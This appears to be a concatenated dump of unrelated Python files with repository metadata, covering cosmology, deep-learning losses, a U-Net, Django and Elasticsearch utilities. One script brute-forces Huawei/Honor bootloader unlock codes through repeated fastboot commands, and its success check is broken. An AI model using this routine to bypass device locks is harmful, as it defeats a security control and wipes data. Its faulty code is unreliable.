def get_bases(rmin, rmax, ncont=300, params=None, cosmo_base=None, redshift=0):
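    # Build the basis array: row 0 is the r grid, row 1 is the fiducial linear-theory
    # correlation function, and each remaining row is the change in xi from a 1% step in
    # one cosmological parameter (finite-difference derivative times the step size).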
if params is None or cosmo_base is None:
raise ValueError("Must pass params and cosmo_base!")
nbases = len(params)+1
rcont = np.linspace(rmin, rmax, ncont)
bases = np.empty((nbases+1, ncont))
bases[0,:] = rcont
Plin = cosmology.LinearPower(cosmo_base, redshift, transfer='EisensteinHu')
CF = cosmology.correlation.CorrelationFunction(Plin)
xi_base = CF(rcont)
bases[1,:] = xi_base
cosmo_derivs = []
ds = []
for i in range(len(params)):
param = params[i]
cosmo_dict = dict(cosmo_base)
val_base = cosmo_dict[param]
dval = val_base * 0.01
val_new = val_base + dval
cosmo_dict[param] = val_new
cosmo = cosmology.Cosmology.from_dict(cosmo_dict)
Plin = cosmology.LinearPower(cosmo, redshift, transfer='EisensteinHu')
CF = cosmology.correlation.CorrelationFunction(Plin)
xi = CF(rcont)
dcosmo = partial_derivative(xi_base, xi, dval)
bases[i+2, :] = dcosmo*dval
return bases
def partial_derivative(f1, f2, dv):
df = f2-f1
deriv = df/dv
return deriv
|
[
"kstoreyfisher@gmail.com"
] |
kstoreyfisher@gmail.com
|
183c89bbdbad838815b0202aaa3b8244c0c3e0a0
|
9f748485689732d700b3fc09b5ab30113fb42b62
|
/src/_pytorch_toolbox/pytorch_toolbox/metrics/focal_loss.py
|
7a2643091c454914f8f34d77402844e0dfde86df
|
[] |
no_license
|
rawmarshmellows/atlas-human-protein-classification
|
8178d98454920c2221f933c9ca6fd29451a14369
|
af34a9a4cfe1d6cfaca5a323df92762b68afac24
|
refs/heads/master
| 2023-03-12T23:48:47.153703
| 2019-05-06T05:53:13
| 2019-05-06T05:53:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 258
|
py
|
from pytorch_toolbox.losses import FocalLoss, focal_loss
def focal_loss_metric(preds, targs, gamma=2):
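    # Mean focal loss over the batch: the helper reshapes the per-element loss to
    # (batch_size, -1) and sums over the last dimension before averaging.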
loss = FocalLoss.reshape_to_batch_size_x_minus_one_and_sum_over_last_dimension(
focal_loss(preds, targs, gamma=gamma))
return loss.mean()
|
[
"kevinyihchyunlu@gmail.com"
] |
kevinyihchyunlu@gmail.com
|
d1866a3db14523626c503c07527ff173bd86f01f
|
ecf9745ec63e01090259603d638f95ba99960cfa
|
/scripts/fix_read_labels.py
|
618e574bcfa6ff335f9d10ed3c91656c03419f75
|
[] |
no_license
|
mujundi/bioinformatics-util
|
d5e90191253ec7893da67ac54a742de9f2a3bf5d
|
56c8b187941307bc4bab302b87bedca732d299ca
|
refs/heads/master
| 2022-06-11T18:46:04.113964
| 2020-05-09T07:08:12
| 2020-05-09T07:08:12
| 262,510,926
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 287
|
py
|
#!/usr/bin/env python
import sys
with open(sys.argv[1], 'r') as infile:
with open(sys.argv[2], 'w') as outfile:
for line in infile:
if line[0] == "@":
x = line.split()
outfile.write("@" + x[2] + "\n")
else:
outfile.write(line)
infile.close()
outfile.close()
|
[
"musajundi@gmail.com"
] |
musajundi@gmail.com
|
8e681924b90b6613bc689d9c2644d9d6e0d6cc26
|
d7097277f4232a6fed712f6cc93962ab1b9faf0f
|
/backend/home/migrations/0001_load_initial_data.py
|
5f46feda5305099e279ea7206a991d9d7b879937
|
[] |
no_license
|
crowdbotics-apps/damp-math-26639
|
5f61e59e81e58886e60ca26fff72752e1f2bc8ed
|
257a3502acdb2dda8199c642cc36b90d0071a209
|
refs/heads/master
| 2023-04-23T09:42:20.501952
| 2021-05-13T06:22:15
| 2021-05-13T06:22:15
| 366,954,391
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 536
|
py
|
from django.db import migrations
def create_site(apps, schema_editor):
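    # Point the default django.contrib.sites record (pk=1) at this app's name and custom domain.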
Site = apps.get_model("sites", "Site")
custom_domain = "damp-math-26639.botics.co"
site_params = {
"name": "Damp Math",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_site),
]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
2f0232b8da18ff839444f156012af2c4c401d005
|
3675330ee6d8a025d3f8647f184b5800cc0459bc
|
/UnetModel/scripts/UnetModelClass.py
|
44ee6bfdf2dd4a42c1f55e04278f8a701668f007
|
[
"MIT"
] |
permissive
|
RoyHirsch/BrainTumorSegmentation
|
b5f1122b4ebabcb912c4c358c233bf5d5bac9a52
|
671326447f77eb750a96a42e1d9b0bfca42e42ce
|
refs/heads/master
| 2020-04-08T02:03:42.171663
| 2018-11-27T08:19:59
| 2018-11-27T08:19:59
| 158,921,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,654
|
py
|
from UnetModel import *
from UnetModel.scripts.layers import *
class UnetModelClass(object):
def __init__(self, layers, num_channels, num_labels, image_size,
kernel_size, depth, pool_size, costStr, optStr, argsDict = {}):
logging.info('#### -------- NetModel object was created -------- ####\n')
self.layers = layers
self.num_channels = num_channels
self.num_labels = num_labels
self.image_size = image_size
self.kernel_size = kernel_size
self.depth = depth
self.pool_size = pool_size
self.costStr = costStr
self.optStr = optStr
self.layersTodisplay = argsDict.pop('layersTodisplay', [0])
self.isBatchNorm = argsDict.pop('isBatchNorm', False)
self.argsDict = argsDict
self.weights_dict = {}
self.convd_dict = {}
self.convu_dict = {}
self.deconv_dict = {}
self.concat_dict = {}
self.max_dict = {}
self.ndepth = 1
self.to_string()
self.logits = self._createNet()
self.predictions = tf.nn.sigmoid(self.logits)
self.loss = self._getCost()
self.optimizer = self._getOptimizer()
def to_string(self):
logging.info('NetModel object properties:')
logging.info('layers : ' + str(self.layers))
logging.info('num_channels : ' + str(self.num_channels))
logging.info('num_labels : ' + str(self.num_labels))
logging.info('image_size : ' + str(self.image_size))
logging.info('depth : ' + str(self.depth))
logging.info('pool_size : ' + str(self.pool_size))
logging.info('costStr : ' + str(self.costStr))
logging.info('optStr : ' + str(self.optStr))
for key, value in self.argsDict.items():
logging.info(str(key) + ' : ' + str(value))
logging.info('\n')
def __del__(self):
# logging.info('#### -------- UnetModel object was deleted -------- ####\n')
pass
def _createNet(self):
# To clear older graphs
tf.reset_default_graph()
# To save the defulte graph under the net class
# self.graph = tf.get_default_graph()
# with self.graph.as_default():
# placeholders for training
self.X = tf.placeholder(dtype=tf.float32, shape=[None, self.image_size, self.image_size, self.num_channels])
self.Y = tf.placeholder(dtype=tf.float32, shape=[None, self.image_size, self.image_size, self.num_labels])
self.isTrain = tf.placeholder(dtype=tf.bool, name='isTrain')
# creates weights,convolution self.layers and downs samples
for l in range(1, self.layers + 2):
if l == 1:
with tf.name_scope('convolution_Down_{}'.format(l)):
self.weights_dict['WD1_{}'.format(l)] = weight_variable([self.kernel_size, self.kernel_size,
self.num_channels, self.depth])
self.weights_dict['WD2_{}'.format(l)] = weight_variable([self.kernel_size, self.kernel_size, self.depth, self.depth])
self.weights_dict['b1_{}'.format(l)] = bias_variable([self.depth])
self.weights_dict['b2_{}'.format(l)] = bias_variable([self.depth])
self.convd_dict['convd1_{}'.format(l)] = conv2d(self.X, self.weights_dict['WD1_{}'.format(l)],
self.weights_dict['b1_{}'.format(l)], self.isBatchNorm, self.isTrain)
self.convd_dict['convd2_{}'.format(l)] = conv2d(self.convd_dict['convd1_{}'.format(l)],
self.weights_dict['WD2_{}'.format(l)],
self.weights_dict['b2_{}'.format(l)], self.isBatchNorm, self.isTrain)
with tf.name_scope('Max_Pool{}'.format(l)):
self.max_dict['max_{}'.format(l)] = max_pool(self.convd_dict['convd2_{}'.format(l)], 2)
else:
self.ndepth = self.ndepth * 2
with tf.name_scope('convolution_Down_{}'.format(l)):
self.weights_dict['WD1_{}'.format(l)] = weight_variable([self.kernel_size, self.kernel_size,
int(self.depth * self.ndepth / 2), self.depth * self.ndepth])
self.weights_dict['WD2_{}'.format(l)] = weight_variable([self.kernel_size, self.kernel_size,
self.depth * self.ndepth, self.depth * self.ndepth])
self.weights_dict['b1_{}'.format(l)] = bias_variable([self.depth * self.ndepth])
self.weights_dict['b2_{}'.format(l)] = bias_variable([self.depth * self.ndepth])
self.convd_dict['convd1_{}'.format(l)] = conv2d(self.max_dict['max_{}'.format(l - 1)],
self.weights_dict['WD1_{}'.format(l)],
self.weights_dict['b1_{}'.format(l)], self.isBatchNorm, self.isTrain)
self.convd_dict['convd2_{}'.format(l)] = conv2d(self.convd_dict['convd1_{}'.format(l)],
self.weights_dict['WD2_{}'.format(l)],
self.weights_dict['b2_{}'.format(l)], self.isBatchNorm, self.isTrain)
if l != (self.layers + 1):
with tf.name_scope('Max_Pool{}'.format(l)):
self.max_dict['max_{}'.format(l)] = max_pool(self.convd_dict['convd2_{}'.format(l)], 2)
else:
with tf.name_scope('Middle'):
self.convu_dict['convu2_{}'.format(l)] = self.convd_dict['convd2_{}'.format(l)]
# upsampling and weights
for l in range(self.layers, 0, -1):
# deconvolution
with tf.name_scope('deconvolution_{}'.format(l)):
self.weights_dict['W_{}'.format(l)] = weight_variable([2, 2,
int(self.depth * self.ndepth / 2), self.depth * self.ndepth])
self.weights_dict['b_{}'.format(l)] = bias_variable([int(self.depth * self.ndepth / 2)])
self.deconv_dict['deconv_{}'.format(l)] = deconv2d(self.convu_dict['convu2_{}'.format(l + 1)],
self.weights_dict['W_{}'.format(l)],
self.weights_dict['b_{}'.format(l)], self.pool_size)
self.concat_dict['conc_{}'.format(l)] = concat(self.convd_dict['convd2_{}'.format(l)],
self.deconv_dict['deconv_{}'.format(l)])
with tf.name_scope('convoultion_up_{}'.format(l)):
self.weights_dict['WU1_{}'.format(l)] = weight_variable([self.kernel_size, self.kernel_size,
self.depth * self.ndepth, int(self.depth * self.ndepth / 2)])
self.weights_dict['WU2_{}'.format(l)] = weight_variable([self.kernel_size, self.kernel_size,
int(self.depth * self.ndepth / 2), int(self.depth * self.ndepth / 2)])
self.weights_dict['b1u_{}'.format(l)] = bias_variable([int(self.depth * self.ndepth / 2)])
self.weights_dict['b2u_{}'.format(l)] = bias_variable([int(self.depth * self.ndepth / 2)])
self.convu_dict['convu1_{}'.format(l)] = conv2d(self.concat_dict['conc_{}'.format(l)],
self.weights_dict['WU1_{}'.format(l)],
self.weights_dict['b1u_{}'.format(l)], self.isBatchNorm, self.isTrain)
self.convu_dict['convu2_{}'.format(l)] = conv2d(self.convu_dict['convu1_{}'.format(l)],
self.weights_dict['WU2_{}'.format(l)],
self.weights_dict['b2u_{}'.format(l)], self.isBatchNorm, self.isTrain)
self.ndepth = int(self.ndepth / 2)
with tf.name_scope('Finel_Layer'):
Wfc = weight_variable([1, 1, self.depth, self.num_labels])
bfc = bias_variable([self.num_labels])
return tf.nn.conv2d(self.convu_dict['convu2_{}'.format(l)], Wfc, strides=[1, 1, 1, 1], padding='SAME') + bfc
def _getCost(self):
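        # Build the training loss selected by costStr (softmax / sigmoid / dice / combined
        # cross-entropy + dice) and attach loss, accuracy and dice summaries for TensorBoard.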
flat_logits = tf.reshape(self.logits, [-1, self.num_labels])
flat_labels = tf.reshape(self.Y, [-1, self.num_labels])
# with self.graph.as_default():
if self.costStr == "softmax":
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=flat_logits, labels=flat_labels))
elif self.costStr == "sigmoid":
if 'weightedSum' in self.argsDict.keys() and self.argsDict['weightedSum']:
loss = tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(targets=self.Y, logits=self.logits ,pos_weight=self.argsDict['weightVal']))
else:
loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=self.Y, logits=self.logits))
elif self.costStr == 'dice':
eps = 1e-10
flatten_predictions = tf.reshape(self.predictions, [-1, self.num_labels])
flatten_Y = tf.reshape(self.Y, [-1, self.num_labels])
intersection = tf.reduce_sum(tf.multiply(flatten_predictions, flatten_Y))
            union = eps + tf.reduce_sum(flatten_predictions) + tf.reduce_sum(flatten_Y)
loss = 1 - ((2. * intersection) / (union + eps))
elif self.costStr == 'combined':
gamma = 0.1
eps = 1e-10
flatten_predictions = tf.reshape(self.predictions, [-1, self.num_labels])
flatten_Y = tf.reshape(self.Y, [-1, self.num_labels])
intersection = tf.reduce_sum(tf.multiply(flatten_predictions, flatten_Y))
            union = eps + tf.reduce_sum(flatten_predictions) + tf.reduce_sum(flatten_Y)
diceLoss = 1 - ((2. * intersection) / (union + eps))
if 'weightedSum' in self.argsDict.keys() and self.argsDict['weightedSum']:
crossEntrophy = tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(targets=self.Y, logits=self.logits,
pos_weight=self.argsDict['weightVal']))
else:
crossEntrophy = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=self.Y, logits=self.logits))
loss = crossEntrophy + gamma * diceLoss
else:
logging.info ("Error : Not defined cost function {}.".format(self.costStr))
summery_loss = tf.summary.scalar('Loss', loss)
summery_acc = tf.summary.scalar('Accuracy', tf_accuracy(self.predictions, self.Y))
summery_dice = tf.summary.scalar('Dice', tf_diceScore(self.predictions, self.Y))
self.merged = tf.summary.merge_all()
return loss
def _getOptimizer(self):
learningRate = self.argsDict.pop('learningRate', 0.01)
# with self.graph.as_default():
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
if self.optStr == 'adam':
optimizer = tf.train.AdamOptimizer(learningRate).minimize(self.loss)
elif self.optStr == 'momentum':
momentum = self.argsDict.pop("momentum", 0.2)
optimizer = tf.train.MomentumOptimizer(learning_rate=learningRate, momentum=momentum).minimize(self.loss)
else:
logging.info ("Error : Not defined optimizer.")
return optimizer
def getLogits(self):
return self.logits
def tf_diceScore(predictions, labels):
eps = 1e-10
predictions = tf.round(predictions)
intersection = tf.reduce_sum(tf.multiply(predictions, labels))
union = eps + tf.reduce_sum(predictions) + tf.reduce_sum(labels)
res = (2. * intersection) / (union + eps)
return res
def tf_accuracy(predictions, labels):
predictions = tf.round(predictions)
eq = tf.equal(predictions, labels)
res = tf.reduce_mean(tf.cast(eq, tf.float32))
return res
|
[
"roymhirsch@gmail.com"
] |
roymhirsch@gmail.com
|
b604b1845abdf19c599b7e779d700cd061ce05e6
|
13f8323d5a3179fe78015e7345fef4c61ddfe421
|
/plus.py
|
e53945fb501cc0d2dab37b94661457b8b4ac8a2f
|
[] |
no_license
|
SeongyeonOh/new
|
2d4697827a51e09db20cc5c93b3219d7b8a35e25
|
50b7fcb14294304be7e7218c306b7857942c43fe
|
refs/heads/master
| 2020-05-22T16:05:25.828330
| 2019-05-13T14:08:59
| 2019-05-13T14:08:59
| 186,422,047
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 94
|
py
|
def plus(a, b):
print("====plus====")
print("result", a + b)
print("this is plus")
|
[
"songyon95@gmail.com"
] |
songyon95@gmail.com
|
9e61862fe63317bbf7901aa72a3a8f989ab495cb
|
2b1f728f29dcab2dc6f9446c25a9f34d71135552
|
/healthcare_disease_prediction/multiLayerPerceptron/predict.py
|
5a516c996bf53f2aec6edc8e9d3fc29117f32501
|
[
"Apache-2.0"
] |
permissive
|
joneswan/certifai-reference-models
|
968bec94592b57202da01d76a5df1648dd2b2897
|
a201edc63edb0ba876eabd459cd3d7f364a99874
|
refs/heads/master
| 2020-11-23T18:34:51.740649
| 2019-12-10T07:42:22
| 2019-12-10T07:42:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 851
|
py
|
import numpy as np
import os
import pickle
import sys
from utils.encode_decode import init_model
model_name = os.getenv("MODElNAME", "diabetes_mlp")
model_ctx = {}
# entrypoint for predict daemon
def predict_diabetes_mlp(msg):
instances = msg.payload.get("instances", [])
if not model_name in model_ctx:
model_ctx[model_name] = init_model(model_name)
return predict(model_ctx, instances)
# predict code goes here
def predict(model_ctx, instances):
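    # Coerce the instances to a 2-D batch, apply the stored scaler when one is present,
    # and return the fitted model's predictions as a plain list.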
instances = np.array(instances, dtype=object)
instances = instances if instances.ndim == 2 else np.reshape(instances, (1, -1))
model_obj = model_ctx[model_name]
scaler = model_obj["scaler"]
if scaler:
instances = scaler.transform(instances)
predictions = model_obj["model"].predict(instances)
return {"predictions": predictions.tolist()}
|
[
"akumar@cognitivescale.com"
] |
akumar@cognitivescale.com
|
ae4bbbf1cc3997fd4d7544bf9c6a3dbf27f7066c
|
b8681049e61dd3da02ff0851a10109f0656e260a
|
/db_config/hxn_db_config.py
|
90197c8525847636aa4945e0fa91573aa60fe1bf
|
[] |
no_license
|
NSLS-II-HXN/dpc
|
a14c52839a0a589fa23a3e023b2cbfc822529610
|
da9323806bd693a847e920ca14e149b02d080906
|
refs/heads/master
| 2021-09-11T03:51:03.084718
| 2021-09-07T20:36:22
| 2021-09-07T20:36:22
| 69,591,740
| 0
| 2
| null | 2021-09-07T20:36:23
| 2016-09-29T17:36:51
|
Python
|
UTF-8
|
Python
| false
| false
| 540
|
py
|
try:
from databroker.v0 import Broker
except ModuleNotFoundError:
from databroker import Broker
from hxntools.handlers.xspress3 import Xspress3HDF5Handler
from hxntools.handlers.timepix import TimepixHDF5Handler
db = Broker.named("hxn")
# db_analysis = Broker.named('hxn_analysis')
db.reg.register_handler(Xspress3HDF5Handler.HANDLER_NAME, Xspress3HDF5Handler, overwrite=True)
db.reg.register_handler(TimepixHDF5Handler._handler_name, TimepixHDF5Handler, overwrite=True)
import hxntools.handlers
hxntools.handlers.register(db)
|
[
"gavrilov.dvs@gmail.com"
] |
gavrilov.dvs@gmail.com
|
c7133dd56eb6758b342a923c518289a067533253
|
85681ec94458b8555822763ec79e7af0892a9ae4
|
/scripts/metadata.py
|
62faad5bb06148176e4141f7bd1d1564c1f82e61
|
[] |
no_license
|
akkartik/readwarp
|
ac32079667ee8ac9be7cd5553f32607ae63df81e
|
fb03aceb892f7b62e3e4e52ce11f6252f89abbd5
|
refs/heads/master
| 2016-09-05T16:01:54.900960
| 2012-07-07T09:38:46
| 2012-07-07T09:38:46
| 37,795,282
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 136
|
py
|
import os, sys, re, traceback, time, pickle
import json
file=sys.argv[1]
var=sys.argv[2]
mdata=json.load(open(file))
print mdata[var]
|
[
"vc@akkartik.com"
] |
vc@akkartik.com
|
72b66300b925ba76ec9dbce59730ec3bd22dee6e
|
1d1217bc1dcdd13151d6650d408819fe5855e7d8
|
/btre/realtors/migrations/0001_initial.py
|
820aef27c6a5777ead56b65e0701a3f8a15054c7
|
[] |
no_license
|
maryamrahdaran/Real-Estate---Django
|
c29e6a283490bb641bc4028d093d7f56dc771690
|
b99bc2103cbc3ba00a45831344a881df8536bbeb
|
refs/heads/main
| 2023-07-04T14:39:22.959728
| 2021-07-29T17:28:33
| 2021-07-29T17:28:33
| 390,793,791
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 921
|
py
|
# Generated by Django 3.1.7 on 2021-03-04 20:13
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Realtor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('photo', models.ImageField(upload_to='photos/%y/%m/%d')),
('description', models.TextField(blank=True)),
('phone', models.CharField(max_length=20)),
('email', models.CharField(max_length=50)),
('is_mvp', models.BooleanField(default=False)),
('hire_date', models.DateTimeField(blank=True, default=datetime.datetime.now)),
],
),
]
|
[
"mrahdara@ucsd.edu"
] |
mrahdara@ucsd.edu
|
1815c9b5a6e628a6614d71c113b2d6c36c07cbb2
|
dd3757d77300812ccc494cc98b3359480ef5636c
|
/project_Data/Project Programs/clustering k-means & mediods/iphoneClu.py
|
ef9dcef94182515e1ed7220647b05cf3c59adb25
|
[] |
no_license
|
neerajsh2008/RProgrames
|
92f43d5407e10941092c095948a145bf93e08d46
|
8c89f165105b70e3976882ff72d3038d5554529f
|
refs/heads/master
| 2021-01-12T00:56:38.585647
| 2015-09-26T06:46:06
| 2015-09-26T06:46:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,231
|
py
|
import simplejson as json
fin=open("iphone_processed_tweets_unigram.json","r")
dataEmo=fin.read()
fin.close()
x=json.loads(dataEmo)
y=["iphone","itunes","gameinsight","iphonegame","collected","coins","gold","apple","states","united","apps","mac","music","food","harvested",
"app","ios","ipad"]
for i in y:
print i
print'========================================================================================'
count=0
for j in x:
if i in j.lower().encode("UTF-8"):
print j
print
count=count+1
if count==20:
break
print "===================================================================================="
fout=open("iphoneClu.txt","w")
for i in y:
fout.write(i)
fout.write('========================================================================================')
count=0
for j in x:
if i in j.lower():
fout.write(j+"\n")
count=count+1
if count==20:
break
fout.write("====================================================================================")
|
[
"inturi99@gmail.com"
] |
inturi99@gmail.com
|
f1258fc7049de702914eefc85c684a346fa52696
|
b0fb856c67ffbba5aff193449e4af7c678f02556
|
/gigasecond/gigasecond.py
|
11a3506f1b13b4774a7b6b40c2b8e65d32bd36e0
|
[] |
no_license
|
naufalmukhbit/exercism-py
|
fd4e4deda2166591110b11d48c6cd6cdd2f7f936
|
243cf8135e12a4099f0a0a6bbad30bbf02066730
|
refs/heads/main
| 2023-02-05T12:37:56.102161
| 2020-12-11T11:04:27
| 2020-12-11T11:04:27
| 319,959,338
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 93
|
py
|
from datetime import timedelta
def add(moment):
return moment + timedelta(seconds=10**9)
|
[
"nmukhbit@gmail.com"
] |
nmukhbit@gmail.com
|
9924dbe22dcfb30ebdab051f6ee0911e6ea2a451
|
781df0aa332a808cd9046791e6886dc8ac26ff5b
|
/jobs/refine/template/reducer_template.py
|
df4ed8a3accb717bf6dc1b284b3aa92b0b8b2ef7
|
[] |
no_license
|
BlueStalker/PyEsReduce
|
dd88ad0422f7e1f6b9b61dcfdcdb66f92dea3a9d
|
6cd345a4a3244a7e5331cc966b47b2d465cd88e5
|
refs/heads/master
| 2021-03-12T19:59:31.436081
| 2014-12-24T05:09:53
| 2014-12-24T05:09:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 992
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from collections import defaultdict
import nltk
import os
import sys
from os.path import abspath, dirname, join
from datetime import datetime, date
from decimal import Decimal
import unittest
import requests
import six
import time
# Test that __all__ is sufficient:
from pyelasticsearch import *
from pyelasticsearch.client import es_kwargs
class CLASSNAME:
job_type = 'JOBTYPE'
def reduce(self, app, items):
# Init the instance for search
es = ElasticSearch('YOUR ELASTIC SEARCH ENDPOINT')
word_freq = defaultdict(int)
for line in items:
for word, frequency in line:
word_freq[word] += frequency
# make all things in word_freq to a test index
for word in word_freq:
key = {}
key['name'] = word
key['count'] = word_freq[word]
es.index("YOUR NEW INDEX", "YOUR NEW INDEX PREFIX", key)
return word_freq
|
[
"curt@loyal3.com"
] |
curt@loyal3.com
|
e7944174ddb9418b08bba2755f4f25a1956c875d
|
dae3b0eda78265cb2316aa8fec1f3a333d9441da
|
/flops_comparison.py
|
b8fed93bc1543e1b69431b88a67da7fe118b3af8
|
[
"MIT"
] |
permissive
|
SebastianWang9/DCANet-1
|
ae26fcd81df4a31e17c0d04fb3a5679816597a45
|
7adbd1a7b59ef8a311e22ea8908d1652efd3f28c
|
refs/heads/main
| 2023-05-14T21:30:12.509093
| 2021-06-09T09:11:48
| 2021-06-09T09:11:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,492
|
py
|
import torch.nn as nn
import torch
import numpy as np
import time
from thop import profile
from thop import clever_format
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from ptsemseg.models.fusionmodel import *
from ptsemseg.models.AMTUnet import *
from ptsemseg.models.ESFNet import *
from ptsemseg.models.RCNNUNet import *
from ptsemseg.models.CasNet import *
from ptsemseg.models.BMANet import *
from ptsemseg.models.difpyramidnet import *
from ptsemseg.models.unet import *
from ptsemseg.models.SAR_unet import *
from ptsemseg.models.utils import *
from torchvision.models import *
from ptsemseg.models.ResUnet import *
from ptsemseg.models.fcn import *
from ptsemseg.models.segnet import *
from ptsemseg.models.AMTUnet import *
torch.backends.cudnn.benchmark = True
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
#
model =DifPyramidNet()
# model = torch.nn.DataParallel(model_b)
input = torch.randn(1,3,224,224)
flop, para = profile(model, inputs = (input, ))
flop, para = clever_format([flop, para], "%.3f")
# print("%.2fM"%(flop/1e6), "%.2fM"%(para/1e6))
print(flop, para)
torch.cuda.set_device(0)
torch.backends.cudnn.benchmark = True
model.eval()
model = model.cuda()
input = torch.randn((1,3,512,512), device=device)
for _ in range(10):
model(input)
torch.cuda.synchronize()
torch.cuda.synchronize()
t_start = time.time()
for _ in range(500):
model(input)
torch.cuda.synchronize()
torch.cuda.synchronize()
elapsed_time = time.time() - t_start
|
[
"Huhu01495"
] |
Huhu01495
|
d55aac6e7fe17a01ac011129dcadef06d513a28e
|
af727f1a052ccd72553f8efade08fad7e0cfbe88
|
/chapter4/q10.py
|
e07ea350ff2128f696d2caadd2529053edc49111
|
[] |
no_license
|
jojotan/Think_Python_Exercises
|
711e84a31dfec98a2b236d906f3219f35a592f62
|
dd383643781fae2c1813097d0318ec23bd5ef73a
|
refs/heads/master
| 2021-02-20T12:58:21.158540
| 2020-03-08T04:22:08
| 2020-03-08T04:22:08
| 245,337,115
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 546
|
py
|
import turtle
def make_window(color,title):
w = turtle.Screen()
w.bgcolor(color)
w.title(title)
return w
def make_turtle(color, size):
t = turtle.Turtle()
t.color(color)
t.pensize(size)
t.speed(2)
return t
def make_star(t, size):
for i in range(5):
t.forward(size)
t.right(144)
w = make_window('lightgreen', 'Square')
tess = make_turtle('pink', 2)
for i in range(5):
make_star(tess,100)
tess.penup()
tess.forward(350)
tess.right(144)
tess.pendown()
w.mainloop()
|
[
"tanzheyu@tans-MacBook.local"
] |
tanzheyu@tans-MacBook.local
|
1c606234500c22dab6cb271f8a8f8089902dcda2
|
410c2a1157447b8753bb7ca1aa0aa9329417c421
|
/unlock.py
|
9d74f8e49d5e5e10e1500c0815eb8df2025dfdfd
|
[
"Apache-2.0"
] |
permissive
|
maxQ05/huawei-honor-unlock-bootloader
|
3f1035fdb9ece1b0429f8820dffdac236ed808f7
|
dbd8d445cdb3e1db0001e46b924f94e089f5caff
|
refs/heads/master
| 2021-02-21T02:45:37.430857
| 2020-03-06T06:54:32
| 2020-03-06T06:54:32
| 245,349,732
| 0
| 0
|
Apache-2.0
| 2020-03-06T06:51:09
| 2020-03-06T06:51:08
| null |
UTF-8
|
Python
| false
| false
| 2,114
|
py
|
# -*- coding: utf-8 -*-
"""
SkyEmie_' 💜 https://github.com/SkyEmie
https://en.wikipedia.org/wiki/Luhn_algorithm
"""
import time
#from flashbootlib import test
import os
import math
import subprocess  # used below to capture fastboot output
##########################################################################################################################
def tryUnlockBootloader(checksum):
unlock = False
algoOEMcode = 1000000000000000 #base
while(unlock == False):
# os.system() only returns the exit status, so 'success' could never be found in it;
# capture the actual fastboot output instead (assumes fastboot prints 'success').
sdrout = subprocess.getoutput('fastboot oem unlock '+str(algoOEMcode))
sdrout = sdrout.split(' ')
for i in sdrout:
if i == 'success':
return(algoOEMcode)
algoOEMcode = algoIncrementChecksum(algoOEMcode, checksum)
def algoIncrementChecksum(genOEMcode, checksum):
genOEMcode+=int(checksum+math.sqrt(imei)*1024)
return(genOEMcode)
def luhn_checksum(imei):
def digits_of(n):
return [int(d) for d in str(n)]
digits = digits_of(imei)
oddDigits = digits[-1::-2]
evenDigits = digits[-2::-2]
checksum = 0
checksum += sum(oddDigits)
for i in evenDigits:
checksum += sum(digits_of(i*2))
return checksum % 10
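# Illustrative check: luhn_checksum(79927398713) returns 0 (a classic valid Luhn number),
# while a non-zero result means the number fails the check-digit test.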
##########################################################################################################################
print('\n\n Unlock Bootloader script - By SkyEmie_\'')
print('\n\n (Please enable USB DEBUG and OEM UNLOCK if the device doesn\'t appear..)')
print(' /!\ All data will be erased /!\\\n')
input(' Press any key to detect device..\n')
os.system('adb devices')
imei = int(input('Type IMEI digit :'))
checksum = luhn_checksum(imei)
input('Press any key to reboot your device..\n')
os.system('adb reboot bootloader')
input('Press any key when your device is ready.. (This may take time, depending on your cpu/serial port)\n')
codeOEM = tryUnlockBootloader(checksum)
os.system('fastboot getvar unlocked')
os.system('fastboot reboot')
print('\n\nDevice unlocked! OEM CODE : '+str(codeOEM))
print('(Keep it safe)\n')
input('Press any key to exit..\n')
exit()
|
[
"noreply@github.com"
] |
maxQ05.noreply@github.com
|
4cbc9378c01a4f9a28ff8a7a46fef64fb95eeb00
|
b9dc3b984fa70012e8ca74340b471692f0a2542d
|
/model/image.py
|
df402e72282a59d63fe75c11a4839c9cf5cb5a24
|
[] |
no_license
|
Zumbalamambo/RetinaNet-Keras
|
0c1e765aba0a435ece6b68c91c5f84e8507350cc
|
80dfcfee71a5d5ba685688c62a841d60c404b26a
|
refs/heads/master
| 2020-03-15T06:13:26.119442
| 2018-04-21T21:34:21
| 2018-04-21T21:34:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,324
|
py
|
from __future__ import division
import PIL
import cv2
import keras
import numpy as np
from model.transform import change_transform_origin
def read_image_rgb(path):
image = np.asarray(PIL.Image.open(path).convert('RGB'))
return image.copy()
